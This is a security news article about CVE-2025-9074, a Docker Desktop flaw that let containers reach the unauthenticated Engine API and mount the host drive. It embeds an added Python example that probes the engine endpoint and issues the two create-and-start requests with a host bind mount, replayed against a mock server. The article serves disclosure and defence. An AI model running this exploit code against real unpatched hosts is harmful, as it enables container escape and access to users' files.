Critical Vulnerability in Docker Desktop Allowed Host Compromise

A critical vulnerability in Docker Desktop for Windows and macOS made it possible to compromise the host system by running a malicious container—even when Enhanced Container Isolation (ECI) protection was enabled.
The flaw, tracked as CVE-2025-9074 with a CVSS score of 9.3, is classified as a server-side request forgery (SSRF) bug. Docker has patched the issue in version 4.44.3.
“A malicious container running in Docker Desktop could gain access to the Docker Engine and launch additional containers without requiring the mounting of the Docker socket,” Docker developers explained in a security advisory. “This could lead to unauthorized access to user files on the host system. Enhanced Container Isolation (ECI) does not protect against this vulnerability.”
Vulnerability Discovery
The issue was discovered by Felix Boulet, an information security specialist, who demonstrated that containers could access the Docker Engine API without authentication via the address:
http://192.168.65[.]7:2375/
From within a container, Boulet was able to create and launch a new container that mounted the C:\ drive of a Windows host into its own file system, using only two wget HTTP POST requests to the engine API (one to create the container, one to start it). Notably, his proof-of-concept exploit required no code execution privileges inside the container.
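The sequence described above, as an added worked example (not Boulet's proof-of-concept and not Docker's code): a check that reports whether the engine API answers unauthenticated from inside a container, plus the two Engine API calls, create and start with a bind mount in `HostConfig.Binds`, replayed against a constructed stand-in engine so the exchange can be inspected offline. The engine address is the one the write-up reports; the spelling of the host path (`C:\`) is an assumption, since Docker Desktop translates Windows paths for bind mounts and the exact form is not given; the `FakeEngine` class is a constructed mock, not a real engine.

```python
import json
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Address reported for the unauthenticated engine endpoint (defanged as
# 192.168.65[.]7:2375 in the write-up). Only meaningful from inside a container.
ENGINE_URL = "http://192.168.65.7:2375"


def probe_engine(base_url, timeout=2.0):
    """Return the body of GET /_ping if the engine answers without auth, else None.

    A Docker Engine answers /_ping with "OK". A patched Docker Desktop, or any
    environment where the endpoint is unreachable from the container, yields None.
    """
    try:
        with urllib.request.urlopen(base_url.rstrip("/") + "/_ping", timeout=timeout) as resp:
            return resp.read().decode(errors="replace")
    except (urllib.error.URLError, OSError, ValueError):
        return None


def build_mount_payload(host_path, image="alpine", mount_point="/host"):
    """Body for POST /containers/create that bind-mounts host_path into the new container.

    The host path spelling (e.g. "C:\\") is an assumption; Docker Desktop translates
    Windows paths for bind mounts and the write-up does not give the exact form.
    """
    return {
        "Image": image,
        "Cmd": ["sh", "-c", "ls " + mount_point],
        "HostConfig": {"Binds": [host_path + ":" + mount_point]},
    }


def create_and_start(base_url, payload, timeout=5.0):
    """The two-request sequence: POST /containers/create, then POST /containers/<id>/start."""
    base = base_url.rstrip("/")
    req = urllib.request.Request(
        base + "/containers/create",
        data=json.dumps(payload).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        container_id = json.load(resp)["Id"]
    req = urllib.request.Request(base + "/containers/" + container_id + "/start", data=b"", method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        started = resp.status == 204   # the engine answers a successful start with 204 No Content
    return container_id, started


class FakeEngine(BaseHTTPRequestHandler):
    """Constructed stand-in for the Engine API (offline only); records what it is asked to do."""
    created = []   # payloads received by /containers/create
    started = []   # ids received by /containers/<id>/start

    def log_message(self, *_):  # keep the demo quiet
        pass

    def do_GET(self):
        if self.path == "/_ping":
            self._reply(200, b"OK", "text/plain")
        else:
            self._reply(404, b"", "text/plain")

    def do_POST(self):
        length = int(self.headers.get("Content-Length") or 0)
        body = self.rfile.read(length) if length else b""
        parts = self.path.strip("/").split("/")
        if self.path == "/containers/create":
            FakeEngine.created.append(json.loads(body))
            cid = "%064x" % len(FakeEngine.created)      # 64-hex-char id like a real engine
            self._reply(201, json.dumps({"Id": cid, "Warnings": []}).encode(), "application/json")
        elif len(parts) == 3 and parts[0] == "containers" and parts[2] == "start":
            FakeEngine.started.append(parts[1])
            self._reply(204, b"", "text/plain")
        else:
            self._reply(404, b"", "text/plain")

    def _reply(self, status, body, ctype):
        self.send_response(status)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


def start_fake_engine():
    """Serve FakeEngine on a random loopback port in a background thread; returns (server, base_url)."""
    server = HTTPServer(("127.0.0.1", 0), FakeEngine)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, "http://127.0.0.1:%d" % server.server_address[1]


if __name__ == "__main__":
    # 1. The check, meant to run inside a Docker Desktop container: "OK" means the engine
    #    API is reachable without authentication and the host is exposed; None means it is not.
    print("engine reachable:", probe_engine(ENGINE_URL))

    # 2. The create/start exchange, replayed against the offline stand-in rather than a real engine.
    server, url = start_fake_engine()
    try:
        cid, ok = create_and_start(url, build_mount_payload("C:\\"))
        print("created", cid[:12], "started:", ok, "binds:", FakeEngine.created[-1]["HostConfig"]["Binds"])
    finally:
        server.shutdown()
```

Running `probe_engine(ENGINE_URL)` from inside a container on a patched Docker Desktop (4.44.3 or later) should return None; an "OK" is the signal that the engine is still reachable unauthenticated. The mock shows what the two requests carry: the bind mount rides entirely in the JSON body of `/containers/create`, which is why the exploit needs nothing more than an HTTP client in the container.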
Cross-Platform Impact
Philippe Dugre, a DevSecOps engineer at Pvotal Technologies and challenge designer for the NorthSec security conference, confirmed that the flaw affected Docker Desktop for Windows and macOS, but not Linux.
According to Dugre, the vulnerability poses a greater risk on Windows because Docker Engine runs inside WSL2 (Windows Subsystem for Linux 2):
“In Windows, an attacker can mount the entire file system with administrator rights and read any file. Ultimately, they could overwrite a system DLL to escalate privileges to the host system’s administrator,” Dugre wrote.
On macOS, however, the impact is mitigated by additional operating system safeguards:
- Attempts to mount a user directory trigger a permission prompt.
- By default, Docker Desktop does not run with administrator privileges.
- The application lacks access to the rest of the file system without explicit user consent.
Remaining Risks on macOS
Despite these safeguards, Dugre cautioned that the flaw still poses risks on macOS. Because attackers could gain full control over the Docker Desktop application and containers, they might still establish backdoors, alter configurations, or manipulate container behavior without user approval.